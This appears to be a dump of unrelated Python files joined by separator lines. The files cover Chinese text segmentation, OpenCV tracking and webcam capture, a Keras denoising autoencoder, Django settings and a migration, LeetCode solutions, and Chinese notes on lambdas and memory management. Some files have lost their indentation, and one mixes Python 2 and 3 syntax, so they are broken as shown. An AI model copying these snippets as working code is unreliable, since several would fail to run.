    # `with` closes the file promptly; the original left the handle open.
    with open(filepath, 'r', encoding='utf-8') as f:
        return [line.strip() for line in f]
# 对句子进行分词
# Lazily-populated stopword set, shared by all seg_sentence calls.
_stopwords = None


# Segment one sentence.
def seg_sentence(sentence):
    """Segment `sentence` with jieba, dropping stopwords and tab tokens.

    Returns the kept tokens each followed by a single space (same output
    format as before, including the trailing space).

    The original reloaded 'stopwords.txt' from disk on every call; the
    stopwords are now read once and kept as a set for O(1) membership tests.
    (Changes to stopwords.txt during a run are no longer picked up.)
    """
    global _stopwords
    if _stopwords is None:
        _stopwords = set(stop_words_list('stopwords.txt'))  # stopword file path
    tokens = jieba.cut(sentence.strip())
    kept = [word for word in tokens
            if word not in _stopwords and word != '\t']
    return ''.join(word + " " for word in kept)
# Stream the wiki corpus line by line and write the segmented output.
# Context managers guarantee both files are closed even if segmentation
# raises part-way through (the original closed them only on success).
with open('wiki.zh.text', 'r', encoding='utf-8') as inputs:
    with open('wiki.zh.text.seg', 'w', encoding='utf-8') as outputs:
        for line in inputs:
            line_seg = seg_sentence(line)  # returns the segmented line as a string
            outputs.write(line_seg + '\n')
|
#!/bin/python3
def mini_max_sum(arr):
current_min = min(arr[:2])
current_max = max(arr[:2])
running_sum = 0
for value in arr[2:]:
if value < current_min:
running_sum += current_min
current_min = value
elif value > current_max:
running_sum += current_max
current_max = value
else:
running_sum += value
return str(running_sum + current_min) + ' ' + str(running_sum + current_max)
print(mini_max_sum([int(x) for x in input().strip().split(' ')])) |
###############################################################################
#
# trackers.py
#
# Python OpenCV program for testing different trackers.
# It is based on code from [https://www.learnopencv.com/object-tracking-using-opencv-cpp-python/]
#
# The program has three operating modes:
# 'm' key Mark: enter this mode while holding an object in front of the webcam,
# and use the mouse to select it with a rectangle.
# 's' key Show: this is a test mode that shows the tracked object. Use this mode
# to test tracking on the display.
#
# TODO
# 't' key Track: this mode activates the motors and sends power controls to them.
# The Track mode will be halted (red 'Track' symbol) if the blob is lost, or
# more than one blob is detected. Tracking will resume automatically when
# a single blob is re-detected.
#
# January 28, 2018
#
###############################################################################
import sys
import numpy as np
import cv2
import opencvconst as cv
import time
###############################################################################
#
# main()
#
def main():
    """Control function that reads webcam, and tracks a marked object."""
    global x0, y0, x1, y1, drawing, mode, frame, bbox, tracker, tracker_initialized
    global MODE_MARK
    #
    # initialization
    #
    # OpenCV's tracker factory API changed in 3.3; split the version string
    # so the right constructor can be chosen below.
    (major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')
    MODE_TRACK = 0 # track an object
    MODE_SHOW = 1 # only show tracking markers on video
    MODE_MARK = 2 # mark region color to track
    MODE_TRACK_HOLD = 3 # temporarily suspend tracking until object is recaptured
    tracker_initialized = False
    bbox = (0, 0, 0, 0)
    last_good_bbox = bbox
    mode = MODE_SHOW
    mode_text = 'Show'
    fps_text = '?? Fps'
    drawing = False # true if mouse is pressed
    x0, y0 = -1, -1
    x1, y1 = -1, -1
    print ' m - mark color region to track\n s - display tracking marker only\n ESC - quit'
    #
    # Initialize start time and frame count (for the FPS display)
    #
    frame_count = 0
    start = time.time()
    #
    # link event callback function
    #
    cv2.namedWindow('image', cv2.WINDOW_GUI_NORMAL+cv2.WINDOW_AUTOSIZE)
    cv2.setMouseCallback('image', mark_rect)
    #
    # setup font for overlay text
    #
    font = cv2.FONT_HERSHEY_SIMPLEX
    #
    # Set up tracker. KCF (index 2) is the hard-coded choice here.
    #
    tracker_types = ['BOOSTING', 'MIL','KCF', 'TLD', 'MEDIANFLOW', 'GOTURN']
    tracker_type = tracker_types[2]
    if int(minor_ver) < 3:
        tracker = cv2.Tracker_create(tracker_type)
    else:
        if tracker_type == 'BOOSTING':
            tracker = cv2.TrackerBoosting_create()
        if tracker_type == 'MIL':
            tracker = cv2.TrackerMIL_create()
        if tracker_type == 'KCF':
            tracker = cv2.TrackerKCF_create()
        if tracker_type == 'TLD':
            tracker = cv2.TrackerTLD_create()
        if tracker_type == 'MEDIANFLOW':
            tracker = cv2.TrackerMedianFlow_create()
        if tracker_type == 'GOTURN':
            tracker = cv2.TrackerGOTURN_create()
    #
    # open the capture device and print some
    # useful properties
    #
    cap = cv2.VideoCapture(0)
    if cap.isOpened():
        #cap.set(cv.CV_CAP_PROP_FRAME_WIDTH, 320)
        #cap.set(cv.CV_CAP_PROP_FRAME_HEIGHT, 240)
        frameWidth = cap.get(cv.CV_CAP_PROP_FRAME_WIDTH)
        frameHeight = cap.get(cv.CV_CAP_PROP_FRAME_HEIGHT)
        print 'frame: width {}, height {}'.format(frameWidth, frameHeight)
        # Frame center, used as the origin of the tracking-error arrow below.
        frameCenterX = int(frameWidth/2)
        frameCenterY = int(frameHeight/2)
    else:
        sys.exit()
    #
    # frame capture and processing loop
    #
    while(True):
        #
        # capture a frame
        # convert to appropriate color space to improve detection
        # in different lighting conditions
        #
        cap_ok, frame = cap.read()
        if not cap_ok:
            break
        #
        # Operations on the captured image done here.
        # If marking a section on the object color for tracking
        # then only display the selection
        #
        if mode == MODE_MARK:
            cv2.rectangle(frame, (x0, y0), (x1, y1), (0, 255, 0), 1)
        #
        # If tracking or only displaying object tracking information
        # then draw the tracking markers on the frame before it is displayed.
        # Only do this if the tracker was initialized
        #
        elif tracker_initialized:
            #
            # Update the tracker with the newly acquired frame.
            #
            track_ok, bbox = tracker.update(frame)
            if track_ok:
                # Blue rectangle around the tracked object, plus an arrow
                # from frame center to object center (the tracking error).
                last_good_bbox = bbox
                p1 = (int(bbox[0]), int(bbox[1]))
                p2 = (int(bbox[0] + bbox[2]), int(bbox[1] + bbox[3]))
                cv2.rectangle(frame, p1, p2, (255, 0, 0), 2)
                object_x = int(bbox[0] + bbox[2]/2)
                object_y = int(bbox[1] + bbox[3]/2)
                err_pan_i = frameCenterX - object_x
                err_tilt_i = frameCenterY - object_y
                cv2.arrowedLine(frame, (frameCenterX, frameCenterY), (object_x, object_y), (255, 0, 0), 2)
                if mode == MODE_TRACK_HOLD:
                    mode = MODE_TRACK
            else:
                # Tracking lost: draw the last good bounding box in red and
                # suspend tracking until the object is recaptured.
                p1 = (int(last_good_bbox[0]), int(last_good_bbox[1]))
                p2 = (int(last_good_bbox[0] + last_good_bbox[2]), int(last_good_bbox[1] + last_good_bbox[3]))
                cv2.rectangle(frame, p1, p2, (0, 0, 255), 1)
                if mode == MODE_TRACK:
                    mode = MODE_TRACK_HOLD
        #
        # Calculate and display FPS over a 10 second window.
        # Use the 10sec interval to also poll the NXT for battery level.
        #
        frame_count = frame_count + 1
        end = time.time()
        measure_interval = end - start
        if measure_interval > 10:
            fps = frame_count / measure_interval
            fps_text = '{:.2f} Fps'.format(fps)
            frame_count = 0
            start = time.time()
        #
        # Add text and other markers to the image
        # (mode text turns red while tracking is on hold)
        #
        if mode == MODE_TRACK_HOLD:
            cv2.putText(frame, mode_text, (1, 20), font, 0.4, (0, 0, 255), 1, cv2.LINE_AA)
        else:
            cv2.putText(frame, mode_text, (1, 20), font, 0.4, (255, 0, 0), 1, cv2.LINE_AA)
        cv2.putText(frame, tracker_type, (1, 40), font, 0.4, (255, 0, 0), 1, cv2.LINE_AA)
        cv2.putText(frame, fps_text, (1, 60), font, 0.4, (255, 0, 0), 1, cv2.LINE_AA)
        #
        # Display the resulting frame
        #
        cv2.imshow('image', frame)
        #
        # key input mode/command
        #
        key = cv2.waitKey(1) & 0xFF
        if key == 27:
            break
        elif key == ord('m'):
            x0,y0 = -1,-1
            x1,y1 = -1,-1
            mode_text = 'Mark'
            mode = MODE_MARK
        elif key == ord('s'):
            mode_text = 'Show'
            mode = MODE_SHOW
        else:
            pass
    #
    # When done, release the capture.
    #
    cap.release()
    cv2.destroyAllWindows()
###########################################################
#
# mark_rect()
#
# Mouse event callback function.
# Used to capture mouse event and mark object for tracking.
#
# param: event type, mouse coordinates and event parameters
# return: nothing, marks a frame region for tracker initialization
#
def mark_rect(event, x, y, flags, param):
    """Mouse callback that marks a frame region for tracker initialization.

    param: event type, mouse coordinates and event parameters
    return: nothing; on left-button release normalizes the rectangle and
            initializes the global tracker with it
    """
    global x0, y0, x1, y1, drawing, mode, frame, bbox, tracker, tracker_initialized
    global MODE_MARK
    # Only react to mouse events while the UI is in Mark mode.
    if mode != MODE_MARK:
        return
    if event == cv2.EVENT_LBUTTONDOWN:
        drawing = True
        x0, y0 = x, y
        x1, y1 = x, y
    elif event == cv2.EVENT_MOUSEMOVE:
        if drawing:
            x1, y1 = x, y
    elif event == cv2.EVENT_LBUTTONUP:
        drawing = False
        #
        # Convert any start (x0,y0) and end (x1,y1) points to be
        # a top-left to bottom right pair.
        # Extract ROI and initialize the tracker
        #
        if x0 == x1 or y0 == y1 or x0 < 0 or x1 < 0 or y0 < 0 or y1 < 0:
            return
        if x0 > x1:
            x0, x1 = x1, x0
        if y0 > y1:
            y0, y1 = y1, y0
        bbox = (x0, y0, x1-x0, y1-y0)
        tracker_initialized = tracker.init(frame, bbox)
        # Single pre-formatted argument so this print works identically as a
        # Python 2 statement and a Python 3 function call (the original used
        # a Python-2-only comma-separated print statement).
        print('tracker.init() {0}'.format(tracker_initialized))
#
# Startup
#
if __name__ == '__main__':
main()
|
# Jaemin Lee (aka, J911)
# 2019
import cv2
import numpy as np
class CustomCapture:
    """Capture webcam frames and label them via the keyboard.

    'a' stores the current frame with label 0 (left), 'd' with label 1
    (right), ESC ends the session.
    """

    def _cam_initialize(self):
        # Open the default camera; properties 3/4 are frame width/height.
        self.cam = cv2.VideoCapture(0)
        self.cam.set(3, 1280)
        self.cam.set(4, 720)

    def _cam_release(self):
        self.cam.release()

    def capture(self, label=''):
        """Run the capture loop; return (capture_data, capture_labels)."""
        capture_data = []
        capture_labels = []
        self._cam_initialize()
        while True:
            ok, img = self.cam.read()
            # Bug fix: the original passed the boolean read() success flag as
            # the cvtColor conversion code (cv2.cvtColor(img, f)). Stop on a
            # failed read and use a real conversion code instead.
            # NOTE(review): BGR->RGB assumed as the intended conversion for
            # downstream model input — confirm.
            if not ok:
                break
            img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
            display_img = cv2.putText(cv2.flip(img, 1), label, (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0))
            cv2.imshow("Custom Capture", display_img)
            # Channels-first layout: (H, W, C) -> (C, H, W).
            img = np.moveaxis(img, -1, 0)
            key = cv2.waitKey(1)
            if key == 97: # left
                capture_data.append(img)
                capture_labels.append(0)
                print("save left photos!")
            if key == 100: #right
                capture_data.append(img)
                capture_labels.append(1)
                print("save right photos!")
            if key == 27: # esc
                break
        self._cam_release()
        return (capture_data, capture_labels)
if __name__ == '__main__':
    # Manual test: capture frames until ESC, then dump the collected samples.
    cap = CustomCapture()
    x, y = cap.capture()
    print(x, y)
import os
import shutil
import sys
from pathlib import Path
import click
from subprocess import check_output
from onegov.core.cli import command_group
from onegov.core.utils import module_path
cli = command_group()
def pre_checks():
    """Exit unless node v10, npm and the foundation cli are all available."""
    # Argument-list form instead of shell=True: same output, no shell
    # involved. NOTE(review): a missing `node` binary now raises
    # FileNotFoundError instead of a shell-level CalledProcessError.
    node_version = check_output(['node', '--version'])
    if 'v10' not in node_version.decode('utf-8'):
        click.secho('Foundation CLI currently works with node version 10')
        sys.exit()
    if not shutil.which('npm'):
        click.secho('Install npm package manager')
        sys.exit()
    if not shutil.which('foundation'):
        click.secho('Install foundation cli first: '
                    'npm install -g foundation-cli')
        sys.exit()
@cli.command(context_settings={
    'matches_required': False,
    'default_selector': '*'
})
def update():
    """ Update helper for foundation6 using node and webpack.

    By the time this cli is used, probably things already changed and
    it needs to be adapted.
    Also some import might not work and have to be adapted manually.
    The Backup files can always be consulted.
    """
    pre_checks()
    # Locate the installed onegov.foundation6 package directories.
    module = Path(module_path('onegov.foundation6', 'foundation')).parent
    assets = module / 'assets'
    src = module / 'foundation'
    vendor_src = module / 'foundation' / 'vendor'
    # src_bckp = module / 'foundation.bak'
    for p in (src, vendor_src, assets):
        assert p.is_dir(), str(p)
    foundation_js_files = ('foundation.min.js', 'foundation.js')
    # Scaffold a throwaway foundation project under /tmp to obtain the
    # node_modules payload; skipped when it already exists.
    os.chdir('/tmp')
    if not os.path.exists('/tmp/foundation-update'):
        os.system(
            'echo foundation-update | '
            'foundation new --framework sites --template zurb'
        )
    os.chdir('foundation-update')
    node_root = Path('/tmp/foundation-update/node_modules/foundation-sites')
    # click.secho('Create a backup', fg='green')
    # shutil.copytree(src, src_bckp)
    # Copy the scss and _vendor trees from the scaffold into the package.
    for name in ('scss', '_vendor'):
        click.secho(f'Copy {name} files')
        dest_ = src / 'foundation' / name
        src_ = node_root / name
        assert src_.is_dir(), str(src_)
        assert dest_.is_dir(), str(dest_)
        shutil.copytree(src_, dest_, dirs_exist_ok=True)
    click.secho('Copy foundation js files')
    for name in foundation_js_files:
        shutil.copyfile(
            node_root / 'dist' / 'js' / name,
            assets / name
        )
    click.secho('Copy motion-ui files')
    mui_src = node_root.parent / 'motion-ui' / 'src'
    assert mui_src.is_dir()
    mui_dest = vendor_src / 'motion-ui'
    assert mui_dest.is_dir()
    shutil.copytree(mui_src, mui_dest, dirs_exist_ok=True)
    click.secho('Run git add . to be sure everything is checked in.')
    click.secho('To roll back the changes, just use the power of git!')
    click.secho('Finished.', fg='green')
|
from rv.modules import Behavior as B
from rv.modules import Module
from rv.modules.base.kicker import BaseKicker
class Kicker(BaseKicker, Module):
    """Kicker module: consumes note events and produces an audio signal."""

    behaviors = {B.receives_notes, B.sends_audio}
|
import torch

# Batch size and number of prior (anchor) boxes.
num = 32
num_priors = 8732
print(num, num_priors)
# Uninitialized (num, num_priors, 4) tensor of box coordinates.
loc_t = torch.Tensor(num, num_priors, 4)
print(loc_t)
# Bug fix: torch.cat(1, 1) raises TypeError — cat expects a sequence of
# tensors plus a dim. Concatenate loc_t with itself along dim 1 as a
# working demonstration (presumed intent of the original experiment).
t = torch.cat((loc_t, loc_t), 1)
print(t)
"""
"""
from leetCodeUtil import TreeNode
class Solution(object):
    """Convert a sorted array into a height-balanced BST (LeetCode 108)."""

    def sortedArrayToBST(self, nums):
        """
        :type nums: List[int]
        :rtype: TreeNode
        """
        # Build over the half-open index range [0, len(nums)).
        return self.constructTree(nums, 0, len(nums))

    def constructTree(self, nums, start, end):
        # An empty range yields no subtree.
        if start >= end:
            return None
        # Middle element becomes the root, keeping both halves balanced.
        mid = (start + end) // 2
        root = TreeNode(nums[mid])
        root.left = self.constructTree(nums, start, mid)
        root.right = self.constructTree(nums, mid + 1, end)
        return root
|
import cv2
import numpy as np
pic = cv2.imread('image.jpg')
# cv2.imread returns None (no exception) when the file cannot be read; fail
# fast with a clear error instead of a cryptic failure inside cv2.threshold.
if pic is None:
    raise FileNotFoundError("Could not read 'image.jpg'")
threshold_value = 100
# Pixels above threshold_value become 255, the rest 0.
(T_value, binary_threshold) = cv2.threshold(pic, threshold_value, 255, cv2.THRESH_BINARY)
cv2.imshow('binary', binary_threshold)
cv2.waitKey()
cv2.destroyAllWindows()
|
# [Exercise]
# keras67_1: add noise to the men/women images and remove it.
# Exercise
# Distinguish men vs. women
# Complete using ImageDataGenerator / fit_generator
import numpy as np
from matplotlib import pyplot as plt
import random
from sklearn.model_selection import train_test_split
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.models import Sequential, Model, load_model
from tensorflow.keras.layers import Dense, Conv2D, Conv2DTranspose, MaxPooling2D, Flatten, Dropout, BatchNormalization, Input
from tensorflow.keras.layers import LeakyReLU, ReLU
from tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint
# Load pre-generated train/validation image arrays.
# NOTE(review): pixel values are assumed to already be in [0, 1] — the clip
# below only makes sense in that range; confirm against the .npy generator.
x_train = np.load('../data/image/brain/npy/k67_train_x.npy')
x_test = np.load('../data/image/brain/npy/k67_val_x.npy')
print(x_train.shape) # (1389, 150, 150, 3)
print(x_test.shape) # (347, 150, 150, 3)
# plt.imshow(x_test[0])
# plt.show()
# Add Gaussian noise (mean 0, sigma 0.1) and clip back into [0, 1].
x_train_noised = x_train + np.random.normal(0, 0.1, size=x_train.shape)
x_test_noised = x_test + np.random.normal(0, 0.1, size=x_test.shape)
x_train_noised = np.clip(x_train_noised, a_min = 0, a_max = 1)
x_test_noised = np.clip(x_test_noised, a_min = 0, a_max = 1)
def autoencoder():
    """Build a convolutional denoising autoencoder for 150x150x3 images.

    Encoder: four strided Conv2D blocks (64 -> 128 -> 256 -> 512 filters),
    each followed by BatchNormalization and LeakyReLU. Decoder: four
    Conv2DTranspose blocks mirroring the encoder, with additive skip
    connections from the pre-activation BatchNorm outputs
    (layer1_/layer2_/layer3_). Returns an uncompiled keras Model.
    """
    inputs = Input(shape=(150,150,3))
    # Encoder. The *_ names keep the BatchNorm outputs for the skips below.
    layer1 = Conv2D(64, (3,3), strides=2, padding='same')(inputs)
    layer1_ = BatchNormalization()(layer1)
    layer1 = LeakyReLU()(layer1_)
    layer2 = Conv2D(128, (3,3), strides=2, padding='valid')(layer1)
    layer2_ = BatchNormalization()(layer2)
    layer2 = LeakyReLU()(layer2_)
    layer3 = Conv2D(256, (3,3), strides=2, padding='valid')(layer2)
    layer3_ = BatchNormalization()(layer3)
    layer3 = LeakyReLU()(layer3_)
    layer4 = Conv2D(512, (3,3), strides=2, padding='same')(layer3)
    layer4_ = BatchNormalization()(layer4)
    layer4 = LeakyReLU()(layer4_)
    # Decoder: transpose convolutions with additive encoder skips.
    layer5 = Conv2DTranspose(256, (3,3), strides=2, padding='same')(layer4)
    layer5 = BatchNormalization()(layer5)
    layer5 = layer5 + layer3_
    layer5 = Dropout(0.5)(layer5)
    layer5 = ReLU()(layer5)
    layer6 = Conv2DTranspose(128, (3,3), strides=2, padding='valid')(layer5)
    layer6 = BatchNormalization()(layer6)
    layer6 = layer6+layer2_
    layer6 = Dropout(0.5)(layer6)
    layer6 = ReLU()(layer6)
    layer7 = Conv2DTranspose(64, (3,3), strides=2, padding='valid')(layer6)
    layer7 = BatchNormalization()(layer7)
    layer7 = layer7+layer1_
    layer7 = Dropout(0.5)(layer7)
    layer7 = ReLU()(layer7)
    # Final transpose conv maps back to 3 channels at the input resolution.
    layer8 = Conv2DTranspose(3, (3,3), strides=2, padding='same')(layer7)
    outputs = layer8
    model = Model(inputs=inputs, outputs=outputs)
    return model
model = autoencoder()
model.summary()
# NOTE(review): binary_crossentropy + accuracy on a reconstruction task is
# unusual — 'accuracy' is not a meaningful reconstruction metric; confirm.
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
modelpath = '../data/modelcheckpoint/noise_model.hdf5'
# All callbacks monitor training accuracy; no validation data is supplied.
es = EarlyStopping(monitor='accuracy', patience=30)
cp = ModelCheckpoint(filepath=modelpath, monitor='accuracy', save_best_only=True)
lr = ReduceLROnPlateau(monitor='accuracy', patience=8, factor=0.8)
# Denoising objective: noisy images in, clean images as the target.
model.fit(x_train_noised, x_train, epochs=1000, callbacks=[es,cp,lr])
# Reload the best checkpoint and denoise the noisy test set.
model = load_model('../data/modelcheckpoint/noise_model.hdf5')
output = model.predict(x_test_noised)
# Plot a 3x5 grid: originals on top, noisy inputs in the middle,
# reconstructions at the bottom. The three copy-pasted loops of the
# original are collapsed into one data-driven loop.
fig, axes = plt.subplots(3, 5, figsize=(20,7))

# Pick 5 test images at random.
random_imgs = random.sample(range(output.shape[0]), 5)

rows = (('INPUT', x_test), ('Noise', x_test_noised), ('OUTPUT', output))
for (row_label, images), axis_row in zip(rows, axes):
    for i, ax in enumerate(axis_row):
        ax.imshow(images[random_imgs[i]].reshape(150,150,3))
        if i == 0:
            # Label only the first column of each row.
            ax.set_ylabel(row_label, size=20)
        ax.grid(False)
        ax.set_xticks([])
        ax.set_yticks([])
plt.show()
|
from .common import * # import the common settings, across all deployments

# Development deployment: run with full debug output.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
def has_debug_toolbar():
    """Return True if the django-debug-toolbar package is importable."""
    try:
        # The import alone proves availability; the original also called
        # dir(debug_toolbar) purely to silence an unused-import warning —
        # a noqa comment does that without the runtime no-op.
        import debug_toolbar  # noqa: F401
        return True
    except ImportError:
        return False
# Wire up django-debug-toolbar only when the package is importable.
if has_debug_toolbar():
    INSTALLED_APPS += (
        'debug_toolbar',
    )
    MIDDLEWARE_CLASSES += (
        'debug_toolbar.middleware.DebugToolbarMiddleware',
    )
    DEBUG_TOOLBAR_CONFIG = {
        # Show the toolbar on redirect responses instead of intercepting them.
        'INTERCEPT_REDIRECTS': False
    }
    DEBUG_TOOLBAR_PANELS = (
        'debug_toolbar.panels.version.VersionDebugPanel',
        'debug_toolbar.panels.timer.TimerDebugPanel',
        'debug_toolbar.panels.settings_vars.SettingsVarsDebugPanel',
        'debug_toolbar.panels.headers.HeaderDebugPanel',
        'debug_toolbar.panels.request_vars.RequestVarsDebugPanel',
        'debug_toolbar.panels.template.TemplateDebugPanel',
        'debug_toolbar.panels.sql.SQLDebugPanel',
        'debug_toolbar.panels.signals.SignalDebugPanel',
        'debug_toolbar.panels.logger.LoggingPanel',
    )
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
# Use the mocked credit backend in development.
MOCK_CREDIT = True
|
"""
匿名函数与lambda
lambda表达式,通常是在需要一个函数,但是又不想费神去命名一个函数的场合下使用,也就是指匿名函数。
lambda所表示的匿名函数的内容应该是很简单的,如果复杂的话,干脆就重新定义一个函数了,使用lambda就有点过于执拗了。
lambda就是用来定义一个匿名函数的,如果还要给他绑定一个名字的话,就会显得有点画蛇添足,通常是直接使用lambda函数。如下所示:
add = lambda x, y : x+y
add(1,2) # 结果为3
那么到底要如何使用lambda表达式呢?
1、应用在函数式编程中
Python提供了很多函数式编程的特性,如:map、reduce、filter、sorted等这些函数都支持函数作为参数,lambda函数就可以应用在函数式编程中。如下:
# 需求:将列表中的元素按照绝对值大小进行升序排列
list1 = [3,5,-4,-1,0,-2,-6]
sorted(list1, key=lambda x: abs(x))
当然,也可以如下:
list1 = [3,5,-4,-1,0,-2,-6]
def get_abs(x):
return abs(x)
sorted(list1,key=get_abs)
只不过这种方式的代码看起来不够Pythonic
2、应用在闭包中
def get_y(a,b):
    return lambda x: a*x + b
y1 = get_y(1,1)
y1(1) # 结果为2
当然,也可以用常规函数实现闭包,如下:
def get_y(a,b):
def func(x):
        return a*x + b
return func
y1 = get_y(1,1)
y1(1) # 结果为2
只不过这种方式显得有点啰嗦。
"""
"""
Python引入了一个机制:引用计数。
python内部使用引用计数,来保持追踪内存中的对象,Python内部记录了对象有多少个引用,即引用计数,
当对象被创建时就创建了一个引用计数,当对象不再需要时,这个对象的引用计数为0时,它被垃圾回收。
总结一下对象会在一下情况下引用计数加1:
1.对象被创建:x=4
2.另外的别人被创建:y=x
3.被作为参数传递给函数:foo(x)
4.作为容器对象的一个元素:a=[1,x,'33']
引用计数减少情况
1.一个本地引用离开了它的作用域。比如上面的foo(x)函数结束时,x指向的对象引用减1。
2.对象的别名被显式的销毁:del x ;或者del y
3.对象的一个别名被赋值给其他对象:x=789
4.对象从一个窗口对象中移除:myList.remove(x)
5.窗口对象本身被销毁:del myList,或者窗口对象本身离开了作用域。
垃圾回收
1、当内存中有不再使用的部分时,垃圾收集器就会把他们清理掉。它会去检查那些引用计数为0的对象,
然后清除其在内存的空间。当然除了引用计数为0的会被清除,还有一种情况也会被垃圾收集器清掉:当两个对象相互引用时,
他们本身其他的引用已经为0了。
2、垃圾回收机制还有一个循环垃圾回收器, 确保释放循环引用对象(a引用b, b引用a, 导致其引用计数永远不为0)。
在Python中,许多时候申请的内存都是小块的内存,这些小块内存在申请后,很快又会被释放,由于这些内存的申请并不是为
了创建对象,所以并没有对象一级的内存池机制。这就意味着Python在运行期间会大量地执行malloc和free的操作,频繁地
在用户态和核心态之间进行切换,这将严重影响Python的执行效率。为了加速Python的执行效率,Python引入了一个内存池机制,
用于管理对小块内存的申请和释放。
内存池机制
Python提供了对内存的垃圾收集机制,但是它将不用的内存放到内存池而不是返回给操作系统。
Python中所有小于256个字节的对象都使用pymalloc实现的分配器,而大的对象则使用系统的 malloc。另外Python对象,如整数,浮点数和List
,都有其独立的私有内存池,对象间不共享他们的内存池。也就是说如果你分配又释放了大量的整数,用于缓存这些整数的内存就不能再分配给浮点数。""" |
/home/ajitkumar/anaconda3/lib/python3.7/fnmatch.py |
#!/usr/bin/python2
__module_name__ = "invite.py"
__module_version__ = "1.0"
__module_description__ = "Invite Plugin"
__module_author__ = "Ferus"
import xchat
def invited(word, word_eol, userdata):
    '''Looks like we've been invited to a channel, lets join it!'''
    # word[0] carries the channel name for xchat's 'Invited' print event.
    print("* \x02[Invite]\x02 Invited to {0}, Now joining.".format(word[0]))
    xchat.command("JOIN {0}".format(word[0]))

# Register the handler so every invite triggers an automatic join.
xchat.hook_print('Invited', invited)
print ("Loaded "+ __module_author__ +"'s "+ __module_description__)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-11-09 15:49
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated Django migration.

    Adds the Marche model (table "marche") and an id_objet foreign key to
    the existing pointtopo and topographie models.  Do not edit the
    operations by hand once applied — create a new migration instead.
    """

    dependencies = [
        ('carto', '0041_auto_20171109_1634'),
    ]

    operations = [
        migrations.CreateModel(
            name='Marche',
            fields=[
                ('id_marche', models.AutoField(primary_key=True, serialize=False)),
                ('datecreation', models.DateField()),
                ('datedestruction', models.DateField(blank=True)),
                ('commentaire', models.CharField(blank=True, max_length=255)),
                ('libelle', models.CharField(max_length=255)),
                ('id_objet', models.ForeignKey(db_column='id_objet', on_delete=django.db.models.deletion.CASCADE, to='carto.Objet')),
            ],
            options={
                'db_table': 'marche',
            },
        ),
        # default=-1 back-fills existing rows; preserve_default=False keeps
        # the field without a default afterwards.
        migrations.AddField(
            model_name='pointtopo',
            name='id_objet',
            field=models.ForeignKey(db_column='id_objet', default=-1, on_delete=django.db.models.deletion.CASCADE, to='carto.Objet'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='topographie',
            name='id_objet',
            field=models.ForeignKey(db_column='id_objet', default=-1, on_delete=django.db.models.deletion.CASCADE, to='carto.Objet'),
            preserve_default=False,
        ),
    ]
|
#Missing numbers
def findMissingNums(arr, limit=10):
    """Describe the numbers missing from sorted *arr* over the range 0..limit.

    Runs of missing numbers are rendered "a - b"; a single missing number is
    rendered on its own.  Entries are separated by " , ".

    Example: findMissingNums([3, 10]) -> '0 - 2 , 4 - 9 , '

    :param arr: non-empty, ascending list of non-negative integers
    :param limit: inclusive upper bound of the reported range (was a
        hard-coded 10; now a backward-compatible parameter)
    :return: the comma-separated description string

    Fixes over the original:
    - consecutive values (diff == 1) no longer emit a spurious "missing"
      number (the original's else branch appended arr[i] + 1, which exists)
    - leftover debug print() calls removed
    """
    res = ''
    # Gap before the first element: 0 .. arr[0]-1.
    if arr[0] > 0:
        res += '0 - ' + str(arr[0] - 1) + ' , '
    # Gaps between consecutive elements.
    for i in range(len(arr) - 1):
        diff = arr[i + 1] - arr[i]
        if diff > 2:
            # A run of missing numbers between the two values.
            res += str(arr[i] + 1) + ' - ' + str(arr[i + 1] - 1) + ' , '
        elif diff == 2:
            # Exactly one number missing between the two values.
            res += str(arr[i] + 1) + ' , '
        # diff <= 1: consecutive (or duplicate) values -> nothing missing.
    # Gap after the last element: arr[-1]+1 .. limit.
    if arr[-1] < limit:
        res += str(arr[-1] + 1) + ' - ' + str(limit)
    return res
# Demo: report the numbers missing from [3, 10] over the default 0..10 range.
arr = [3 , 10]
n = 5  # NOTE(review): unused in this file — looks like a leftover; confirm before removing
print(findMissingNums(arr))
|
# @Title: 汉明距离 (Hamming Distance)
# @Author: 2464512446@qq.com
# @Date: 2019-09-06 16:58:22
# @Runtime: 20 ms
# @Memory: 11.4 MB
class Solution(object):
    def hammingDistance(self, x, y):
        """Return the number of bit positions at which x and y differ.

        :type x: int
        :type y: int
        :rtype: int
        """
        # XOR leaves a 1 exactly where the operands disagree; count those.
        xor = x ^ y
        return sum(1 for bit in bin(xor)[2:] if bit == '1')
|
from .zhihu import ZhihuSpider
from .hupu import HupuSpider
from .v2ex import V2exSpider
from .weibo import WeiBoSpider
from .github import GithubSpider
from .tieba import TiebaSpider
from .douban import DoubanSpider
from .tianya import TianyaSpider
from .baidu import BaiduSpider
from .spider_36kr import Spider36kr
from .qdaily import QdailySpider
from .guokr import GuokrSpider
from .huxiu import HuxiuSpider |
import cv2
import logging
import numpy as np
from .tracklet import Tracklet
class Tracker:
    """Online multi-object tracker following the tracking-by-detection paradigm.

    For each frame, tick() optionally motion-predicts the active tracklets,
    runs the detector, encodes features for each detection, associates the
    detections with the tracklets via the matcher, and updates/creates/kills
    tracklets accordingly.
    """

    def __init__(self, detector, encoders, matcher, predictor=None, last_frame=None, max_ttl=30, max_feature_history=30,
                 max_detection_history=3000, min_time_lived=5):
        """
        :param detector: callable(img) -> list of Detection objects.
        :param encoders: iterable of encoders; each is callable(detections, img)
            and exposes a `name` attribute used as the feature key.
        :param matcher: callable(tracklets, features) -> (row_ind, col_ind).
        :param predictor: optional motion predictor applied before detection.
        :param last_frame: previous frame, used by ECC-style predictors.
        :param max_ttl: frames an unmatched tracklet survives before removal.
        :param max_feature_history: per-tracklet feature history cap.
        :param max_detection_history: per-tracklet detection history cap.
        :param min_time_lived: minimum life span (only referenced by the
            commented-out filter in kill_tracklet).
        """
        self.detector = detector
        self.encoders = encoders
        self.matcher = matcher
        self.last_frame = last_frame
